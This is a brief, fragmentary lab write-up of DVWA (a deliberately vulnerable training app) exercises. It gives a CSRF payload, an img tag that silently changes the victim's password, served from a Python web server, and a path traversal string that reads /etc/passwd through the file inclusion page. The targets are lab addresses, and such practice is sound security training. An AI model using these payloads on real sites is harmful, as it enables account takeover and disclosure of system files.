DVWA Exercises 3
Last updated
Last updated
Let's type in a password and grab the request in Burp
The attacker must prepare a Website with a manipulated string. This attack only works if the victim is logged in on the target website (session cookie must be valid) and clicks on the manipualted link.
Attackers Side:
cd /home/hacker
mkdir webroot
python3 -m http.server 8001
Create a html file with the following content:
<img src="http://10.70.0.1/vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change">
Victim Side:
Attack string:
http://172.17.0.1/vulnerabilities/fi/?page=../../../../../etc/passwd
